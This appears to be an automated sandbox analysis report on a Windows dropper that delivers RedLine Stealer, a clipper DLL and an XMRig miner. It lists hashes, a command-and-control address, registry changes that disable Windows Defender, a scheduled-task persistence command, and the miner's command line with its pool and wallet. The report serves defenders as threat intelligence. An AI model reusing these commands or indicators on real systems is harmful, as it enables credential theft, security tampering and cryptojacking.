Analysis
-
max time kernel
84s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
23-05-2023 02:13
Static task
static1
General
-
Target
f1c442f87d3bd4c77de9840183c2a6987b96461b01c8c990f959bb945ad638ce.exe
-
Size
1020KB
-
MD5
741fbf21903f1521ccce5e91abbe34be
-
SHA1
bb28542eed0ab70bf3a01f97cd00ab3c00714fb4
-
SHA256
f1c442f87d3bd4c77de9840183c2a6987b96461b01c8c990f959bb945ad638ce
-
SHA512
2d20a9374a1396e2bfb8dffd68ae9d99bdbac50b5695242bdaa1f93b3e2a8e81963aa8c6acb8e337b212aac0fbff2153a53f5fbbc42e1afe30637993c48c17f8
-
SSDEEP
24576:Gyvpa13VZKVF/OjVoFZQMvDtnJdGESlWRws+ZXGLYjWxbhSuj9Y44K:Vvk3VmOjVSZ9QliMXG6WxVt244
Malware Config
Extracted
redline
luxa
77.91.68.157:19065
-
auth_value
2dda654f9abf47e50c7446be3ecc1806
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" o2710377.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" o2710377.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" o2710377.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" o2710377.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection o2710377.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" o2710377.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 19 IoCs
resource yara_rule behavioral1/memory/1108-210-0x0000000004990000-0x00000000049CC000-memory.dmp family_redline behavioral1/memory/1108-212-0x0000000004990000-0x00000000049CC000-memory.dmp family_redline behavioral1/memory/1108-209-0x0000000004990000-0x00000000049CC000-memory.dmp family_redline behavioral1/memory/1108-214-0x0000000004990000-0x00000000049CC000-memory.dmp family_redline behavioral1/memory/1108-216-0x0000000004990000-0x00000000049CC000-memory.dmp family_redline behavioral1/memory/1108-218-0x0000000004990000-0x00000000049CC000-memory.dmp family_redline behavioral1/memory/1108-220-0x0000000004990000-0x00000000049CC000-memory.dmp family_redline behavioral1/memory/1108-222-0x0000000004990000-0x00000000049CC000-memory.dmp family_redline behavioral1/memory/1108-224-0x0000000004990000-0x00000000049CC000-memory.dmp family_redline behavioral1/memory/1108-226-0x0000000004990000-0x00000000049CC000-memory.dmp family_redline behavioral1/memory/1108-228-0x0000000004990000-0x00000000049CC000-memory.dmp family_redline behavioral1/memory/1108-230-0x0000000004990000-0x00000000049CC000-memory.dmp family_redline behavioral1/memory/1108-232-0x0000000004990000-0x00000000049CC000-memory.dmp family_redline behavioral1/memory/1108-234-0x0000000004990000-0x00000000049CC000-memory.dmp family_redline behavioral1/memory/1108-236-0x0000000004990000-0x00000000049CC000-memory.dmp family_redline behavioral1/memory/1108-238-0x0000000004990000-0x00000000049CC000-memory.dmp family_redline behavioral1/memory/1108-240-0x0000000004990000-0x00000000049CC000-memory.dmp family_redline behavioral1/memory/1108-242-0x0000000004990000-0x00000000049CC000-memory.dmp family_redline behavioral1/memory/1108-244-0x0000000004990000-0x00000000049CC000-memory.dmp family_redline -
LoaderBot executable 4 IoCs
resource yara_rule behavioral1/files/0x0007000000023177-1194.dat loaderbot behavioral1/files/0x0007000000023177-1201.dat loaderbot behavioral1/files/0x0007000000023177-1200.dat loaderbot behavioral1/memory/3844-1202-0x0000000000690000-0x0000000000A8E000-memory.dmp loaderbot -
XMRig Miner payload 1 IoCs
resource yara_rule behavioral1/memory/2508-1226-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Control Panel\International\Geo\Nation s2693757.exe Key value queried \REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Control Panel\International\Geo\Nation legends.exe Key value queried \REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Control Panel\International\Geo\Nation wdagad.exe Key value queried \REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Control Panel\International\Geo\Nation work.exe Key value queried \REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Control Panel\International\Geo\Nation fesa.exe -
Executes dropped EXE 16 IoCs
pid Process 1240 z7174753.exe 4564 z4568211.exe 2032 o2710377.exe 4960 p9831350.exe 1108 r1037706.exe 4128 s2693757.exe 1572 s2693757.exe 5076 s2693757.exe 3752 legends.exe 1052 legends.exe 4836 wdagad.exe 4340 work.exe 3844 fesa.exe 3332 legends.exe 2508 Driver.exe 2188 legends.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features o2710377.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" o2710377.exe -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" z7174753.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce z4568211.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" z4568211.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce f1c442f87d3bd4c77de9840183c2a6987b96461b01c8c990f959bb945ad638ce.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" f1c442f87d3bd4c77de9840183c2a6987b96461b01c8c990f959bb945ad638ce.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce z7174753.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 4128 set thread context of 5076 4128 s2693757.exe 92 PID 3752 set thread context of 1052 3752 legends.exe 94 PID 3332 set thread context of 2188 3332 legends.exe 112 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3932 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2032 o2710377.exe 2032 o2710377.exe 4960 p9831350.exe 4960 p9831350.exe 1108 r1037706.exe 1108 r1037706.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe 3844 fesa.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 652 Process not Found -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 2032 o2710377.exe Token: SeDebugPrivilege 4960 p9831350.exe Token: SeDebugPrivilege 1108 r1037706.exe Token: SeDebugPrivilege 4128 s2693757.exe Token: SeDebugPrivilege 3752 legends.exe Token: SeDebugPrivilege 3844 fesa.exe Token: SeDebugPrivilege 3332 legends.exe Token: SeLockMemoryPrivilege 2508 Driver.exe Token: SeLockMemoryPrivilege 2508 Driver.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 5076 s2693757.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 540 wrote to memory of 1240 540 f1c442f87d3bd4c77de9840183c2a6987b96461b01c8c990f959bb945ad638ce.exe 84 PID 540 wrote to memory of 1240 540 f1c442f87d3bd4c77de9840183c2a6987b96461b01c8c990f959bb945ad638ce.exe 84 PID 540 wrote to memory of 1240 540 f1c442f87d3bd4c77de9840183c2a6987b96461b01c8c990f959bb945ad638ce.exe 84 PID 1240 wrote to memory of 4564 1240 z7174753.exe 85 PID 1240 wrote to memory of 4564 1240 z7174753.exe 85 PID 1240 wrote to memory of 4564 1240 z7174753.exe 85 PID 4564 wrote to memory of 2032 4564 z4568211.exe 86 PID 4564 wrote to memory of 2032 4564 z4568211.exe 86 PID 4564 wrote to memory of 2032 4564 z4568211.exe 86 PID 4564 wrote to memory of 4960 4564 z4568211.exe 87 PID 4564 wrote to memory of 4960 4564 z4568211.exe 87 PID 4564 wrote to memory of 4960 4564 z4568211.exe 87 PID 1240 wrote to memory of 1108 1240 z7174753.exe 88 PID 1240 wrote to memory of 1108 1240 z7174753.exe 88 PID 1240 wrote to memory of 1108 1240 z7174753.exe 88 PID 540 wrote to memory of 4128 540 f1c442f87d3bd4c77de9840183c2a6987b96461b01c8c990f959bb945ad638ce.exe 90 PID 540 wrote to memory of 4128 540 f1c442f87d3bd4c77de9840183c2a6987b96461b01c8c990f959bb945ad638ce.exe 90 PID 540 wrote to memory of 4128 540 f1c442f87d3bd4c77de9840183c2a6987b96461b01c8c990f959bb945ad638ce.exe 90 PID 4128 wrote to memory of 1572 4128 s2693757.exe 91 PID 4128 wrote to memory of 1572 4128 s2693757.exe 91 PID 4128 wrote to memory of 1572 4128 s2693757.exe 91 PID 4128 wrote to memory of 1572 4128 s2693757.exe 91 PID 4128 wrote to memory of 5076 4128 s2693757.exe 92 PID 4128 wrote to memory of 5076 4128 s2693757.exe 92 PID 4128 wrote to memory of 5076 4128 s2693757.exe 92 PID 4128 wrote to memory of 5076 4128 s2693757.exe 92 PID 4128 wrote to memory of 5076 4128 s2693757.exe 92 PID 4128 wrote to memory of 5076 4128 s2693757.exe 92 PID 4128 wrote to memory of 5076 4128 s2693757.exe 92 PID 4128 wrote to memory of 5076 4128 s2693757.exe 92 PID 4128 wrote to memory of 5076 4128 s2693757.exe 92 PID 4128 wrote to memory of 5076 4128 s2693757.exe 92 PID 5076 wrote to memory of 3752 5076 s2693757.exe 93 PID 5076 wrote to memory of 3752 5076 s2693757.exe 93 PID 5076 wrote to memory of 3752 5076 s2693757.exe 93 PID 3752 wrote to memory of 1052 3752 legends.exe 94 PID 3752 wrote to memory of 1052 3752 legends.exe 94 PID 3752 wrote to memory of 1052 3752 legends.exe 94 PID 3752 wrote to memory of 1052 3752 legends.exe 94 PID 3752 wrote to memory of 1052 3752 legends.exe 94 PID 3752 wrote to memory of 1052 3752 legends.exe 94 PID 3752 wrote to memory of 1052 3752 legends.exe 94 PID 3752 wrote to memory of 1052 3752 legends.exe 94 PID 3752 wrote to memory of 1052 3752 legends.exe 94 PID 3752 wrote to memory of 1052 3752 legends.exe 94 PID 1052 wrote to memory of 3932 1052 legends.exe 95 PID 1052 wrote to memory of 3932 1052 legends.exe 95 PID 1052 wrote to memory of 3932 1052 legends.exe 95 PID 1052 wrote to memory of 3252 1052 legends.exe 98 PID 1052 wrote to memory of 3252 1052 legends.exe 98 PID 1052 wrote to memory of 3252 1052 legends.exe 98 PID 3252 wrote to memory of 116 3252 cmd.exe 99 PID 3252 wrote to memory of 116 3252 cmd.exe 99 PID 3252 wrote to memory of 116 3252 cmd.exe 99 PID 3252 wrote to memory of 4032 3252 cmd.exe 100 PID 3252 wrote to memory of 4032 3252 cmd.exe 100 PID 3252 wrote to memory of 4032 3252 cmd.exe 100 PID 3252 wrote to memory of 1792 3252 cmd.exe 101 PID 3252 wrote to memory of 1792 3252 cmd.exe 101 PID 3252 wrote to memory of 1792 3252 cmd.exe 101 PID 3252 wrote to memory of 3716 3252 cmd.exe 102 PID 3252 wrote to memory of 3716 3252 cmd.exe 102 PID 3252 wrote to memory of 3716 3252 cmd.exe 102 PID 3252 wrote to memory of 4100 3252 cmd.exe 103
Processes
-
C:\Users\Admin\AppData\Local\Temp\f1c442f87d3bd4c77de9840183c2a6987b96461b01c8c990f959bb945ad638ce.exe"C:\Users\Admin\AppData\Local\Temp\f1c442f87d3bd4c77de9840183c2a6987b96461b01c8c990f959bb945ad638ce.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:540 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\z7174753.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\z7174753.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\z4568211.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\z4568211.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4564 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\o2710377.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\o2710377.exe4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\p9831350.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\p9831350.exe4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4960
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\r1037706.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\r1037706.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1108
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s2693757.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s2693757.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4128 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s2693757.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s2693757.exe3⤵
- Executes dropped EXE
PID:1572
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s2693757.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s2693757.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe"C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3752 -
C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exeC:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legends.exe /TR "C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe" /F6⤵
- Creates scheduled task(s)
PID:3932
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legends.exe" /P "Admin:N"&&CACLS "legends.exe" /P "Admin:R" /E&&echo Y|CACLS "..\41bde21dc7" /P "Admin:N"&&CACLS "..\41bde21dc7" /P "Admin:R" /E&&Exit6⤵
- Suspicious use of WriteProcessMemory
PID:3252 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:116
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "legends.exe" /P "Admin:N"7⤵PID:4032
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "legends.exe" /P "Admin:R" /E7⤵PID:1792
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:3716
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\41bde21dc7" /P "Admin:N"7⤵PID:4100
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\41bde21dc7" /P "Admin:R" /E7⤵PID:1768
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000026001\wdagad.exe"C:\Users\Admin\AppData\Local\Temp\1000026001\wdagad.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
PID:4836 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "7⤵PID:4088
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\work.exework.exe -priverdD8⤵
- Checks computer location settings
- Executes dropped EXE
PID:4340 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\fesa.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\fesa.exe"9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3844 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 210⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
-
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main6⤵PID:3448
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exeC:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3332 -
C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exeC:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe2⤵
- Executes dropped EXE
PID:2188
-
-
C:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exeC:\Users\Admin\AppData\Local\Temp\41bde21dc7\legends.exe1⤵PID:3360
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
425B
MD54eaca4566b22b01cd3bc115b9b0b2196
SHA1e743e0792c19f71740416e7b3c061d9f1336bf94
SHA25634ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb
SHA512bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1
-
Filesize
2.1MB
MD579931719ae9c21e1d8c5f1a419e85f71
SHA1d4c5bdc3d4a0f2e9ca5f6e9407b837dea75c8edd
SHA256f1e4bb232f6e5e0bcfb68627aea7b09b114e8f6d15a57a6e2e938db455d768bb
SHA512e71ee3950f025f4aa0727a52b4493d9c57671bd73b3ae9309983229071c1812d2b9801067a0e80fa04dddc5e13e3dfdb223f07c75ab7757f296f79db7bad986f
-
Filesize
2.1MB
MD579931719ae9c21e1d8c5f1a419e85f71
SHA1d4c5bdc3d4a0f2e9ca5f6e9407b837dea75c8edd
SHA256f1e4bb232f6e5e0bcfb68627aea7b09b114e8f6d15a57a6e2e938db455d768bb
SHA512e71ee3950f025f4aa0727a52b4493d9c57671bd73b3ae9309983229071c1812d2b9801067a0e80fa04dddc5e13e3dfdb223f07c75ab7757f296f79db7bad986f
-
Filesize
2.1MB
MD579931719ae9c21e1d8c5f1a419e85f71
SHA1d4c5bdc3d4a0f2e9ca5f6e9407b837dea75c8edd
SHA256f1e4bb232f6e5e0bcfb68627aea7b09b114e8f6d15a57a6e2e938db455d768bb
SHA512e71ee3950f025f4aa0727a52b4493d9c57671bd73b3ae9309983229071c1812d2b9801067a0e80fa04dddc5e13e3dfdb223f07c75ab7757f296f79db7bad986f
-
Filesize
963KB
MD527c38312fefc9325f0aae14da7179dd3
SHA198912496b21a3da3c31e0b1ed7648f203338e3eb
SHA2567f2da7c20a990267acd392eacf77983ac362fdf2efabd5237ea03cb0bc2c079e
SHA512bb6ea5456720edf29f5c4e10839719848804c640f8fd4a855738cf75f341a002c00019308630c8348c071acd39c4cf8ae65c0caaaa1c454a262467a410065893
-
Filesize
963KB
MD527c38312fefc9325f0aae14da7179dd3
SHA198912496b21a3da3c31e0b1ed7648f203338e3eb
SHA2567f2da7c20a990267acd392eacf77983ac362fdf2efabd5237ea03cb0bc2c079e
SHA512bb6ea5456720edf29f5c4e10839719848804c640f8fd4a855738cf75f341a002c00019308630c8348c071acd39c4cf8ae65c0caaaa1c454a262467a410065893
-
Filesize
963KB
MD527c38312fefc9325f0aae14da7179dd3
SHA198912496b21a3da3c31e0b1ed7648f203338e3eb
SHA2567f2da7c20a990267acd392eacf77983ac362fdf2efabd5237ea03cb0bc2c079e
SHA512bb6ea5456720edf29f5c4e10839719848804c640f8fd4a855738cf75f341a002c00019308630c8348c071acd39c4cf8ae65c0caaaa1c454a262467a410065893
-
Filesize
963KB
MD527c38312fefc9325f0aae14da7179dd3
SHA198912496b21a3da3c31e0b1ed7648f203338e3eb
SHA2567f2da7c20a990267acd392eacf77983ac362fdf2efabd5237ea03cb0bc2c079e
SHA512bb6ea5456720edf29f5c4e10839719848804c640f8fd4a855738cf75f341a002c00019308630c8348c071acd39c4cf8ae65c0caaaa1c454a262467a410065893
-
Filesize
963KB
MD527c38312fefc9325f0aae14da7179dd3
SHA198912496b21a3da3c31e0b1ed7648f203338e3eb
SHA2567f2da7c20a990267acd392eacf77983ac362fdf2efabd5237ea03cb0bc2c079e
SHA512bb6ea5456720edf29f5c4e10839719848804c640f8fd4a855738cf75f341a002c00019308630c8348c071acd39c4cf8ae65c0caaaa1c454a262467a410065893
-
Filesize
963KB
MD527c38312fefc9325f0aae14da7179dd3
SHA198912496b21a3da3c31e0b1ed7648f203338e3eb
SHA2567f2da7c20a990267acd392eacf77983ac362fdf2efabd5237ea03cb0bc2c079e
SHA512bb6ea5456720edf29f5c4e10839719848804c640f8fd4a855738cf75f341a002c00019308630c8348c071acd39c4cf8ae65c0caaaa1c454a262467a410065893
-
Filesize
963KB
MD527c38312fefc9325f0aae14da7179dd3
SHA198912496b21a3da3c31e0b1ed7648f203338e3eb
SHA2567f2da7c20a990267acd392eacf77983ac362fdf2efabd5237ea03cb0bc2c079e
SHA512bb6ea5456720edf29f5c4e10839719848804c640f8fd4a855738cf75f341a002c00019308630c8348c071acd39c4cf8ae65c0caaaa1c454a262467a410065893
-
Filesize
963KB
MD527c38312fefc9325f0aae14da7179dd3
SHA198912496b21a3da3c31e0b1ed7648f203338e3eb
SHA2567f2da7c20a990267acd392eacf77983ac362fdf2efabd5237ea03cb0bc2c079e
SHA512bb6ea5456720edf29f5c4e10839719848804c640f8fd4a855738cf75f341a002c00019308630c8348c071acd39c4cf8ae65c0caaaa1c454a262467a410065893
-
Filesize
963KB
MD527c38312fefc9325f0aae14da7179dd3
SHA198912496b21a3da3c31e0b1ed7648f203338e3eb
SHA2567f2da7c20a990267acd392eacf77983ac362fdf2efabd5237ea03cb0bc2c079e
SHA512bb6ea5456720edf29f5c4e10839719848804c640f8fd4a855738cf75f341a002c00019308630c8348c071acd39c4cf8ae65c0caaaa1c454a262467a410065893
-
Filesize
963KB
MD527c38312fefc9325f0aae14da7179dd3
SHA198912496b21a3da3c31e0b1ed7648f203338e3eb
SHA2567f2da7c20a990267acd392eacf77983ac362fdf2efabd5237ea03cb0bc2c079e
SHA512bb6ea5456720edf29f5c4e10839719848804c640f8fd4a855738cf75f341a002c00019308630c8348c071acd39c4cf8ae65c0caaaa1c454a262467a410065893
-
Filesize
963KB
MD527c38312fefc9325f0aae14da7179dd3
SHA198912496b21a3da3c31e0b1ed7648f203338e3eb
SHA2567f2da7c20a990267acd392eacf77983ac362fdf2efabd5237ea03cb0bc2c079e
SHA512bb6ea5456720edf29f5c4e10839719848804c640f8fd4a855738cf75f341a002c00019308630c8348c071acd39c4cf8ae65c0caaaa1c454a262467a410065893
-
Filesize
576KB
MD5623d6e0d732a02f1bbaab4935790c0fb
SHA1267ff9bdf1c831da588bc797e4da55cb90223d8d
SHA2566ae016ff8921ce3275ac858cef4dd3f2133c91b611bb995836eb819a09a69828
SHA5126a16e2cd052b4cd1d859d94c257e0e241e1f590399f954d84914a4e30c8025cb7af025f4ba6d0b96060f29febd975ce1a70879b2197aa1e89a7b83b36b86b787
-
Filesize
576KB
MD5623d6e0d732a02f1bbaab4935790c0fb
SHA1267ff9bdf1c831da588bc797e4da55cb90223d8d
SHA2566ae016ff8921ce3275ac858cef4dd3f2133c91b611bb995836eb819a09a69828
SHA5126a16e2cd052b4cd1d859d94c257e0e241e1f590399f954d84914a4e30c8025cb7af025f4ba6d0b96060f29febd975ce1a70879b2197aa1e89a7b83b36b86b787
-
Filesize
284KB
MD56352204cce88861bc2e3ff7e02e28191
SHA1271d616ff62fe22dffef638da2bbed8e33aa6ad7
SHA256945b5a63ed55d458a3e2446cf5811696531f967a2cb3f96cb380417623925970
SHA512c22fb7038b280dcc2389abf36cfd3b91f4b54de215580d1eaf9eea380c7db53d06c3dfd44f18a9fee1fd4142f67f8f84a4aec53d7d69e293741752eb328a5fad
-
Filesize
284KB
MD56352204cce88861bc2e3ff7e02e28191
SHA1271d616ff62fe22dffef638da2bbed8e33aa6ad7
SHA256945b5a63ed55d458a3e2446cf5811696531f967a2cb3f96cb380417623925970
SHA512c22fb7038b280dcc2389abf36cfd3b91f4b54de215580d1eaf9eea380c7db53d06c3dfd44f18a9fee1fd4142f67f8f84a4aec53d7d69e293741752eb328a5fad
-
Filesize
305KB
MD5dc5bb32dfb0434a2117bd3218c4319a0
SHA1eaa231ea2fd22494118dbce4cf639643a7d820bc
SHA2568ca11f82c925790f0bde3bcf0ebd16a05e86d09c1c0648dbc606fb10793d9267
SHA5129c3419d44bbbe60f6b51f987bf8c4f673bae984fe51017ed0a5f29cee1078952da4adf65a83d1349294bad393e25a28f02db317704037e509404013adb2eeaa5
-
Filesize
305KB
MD5dc5bb32dfb0434a2117bd3218c4319a0
SHA1eaa231ea2fd22494118dbce4cf639643a7d820bc
SHA2568ca11f82c925790f0bde3bcf0ebd16a05e86d09c1c0648dbc606fb10793d9267
SHA5129c3419d44bbbe60f6b51f987bf8c4f673bae984fe51017ed0a5f29cee1078952da4adf65a83d1349294bad393e25a28f02db317704037e509404013adb2eeaa5
-
Filesize
185KB
MD574dd5438cc863508c24f71a1d0baa7ad
SHA159c8381dedf234b429443967d3cbc39032cce54d
SHA2567ae652abf0ac1438748c4b25576380fb4f379b1837e5af64ea2f8e640ae06eae
SHA512965072a837bc25a33e872aae4f3a1bd6f989ae9077b9febd957c3d75315190ab9ccde0907b611390f9b49a662657166da68270a6445191558ab5fe71317188bb
-
Filesize
185KB
MD574dd5438cc863508c24f71a1d0baa7ad
SHA159c8381dedf234b429443967d3cbc39032cce54d
SHA2567ae652abf0ac1438748c4b25576380fb4f379b1837e5af64ea2f8e640ae06eae
SHA512965072a837bc25a33e872aae4f3a1bd6f989ae9077b9febd957c3d75315190ab9ccde0907b611390f9b49a662657166da68270a6445191558ab5fe71317188bb
-
Filesize
145KB
MD5ee978d6a0482dec1eae0e22d50deef6c
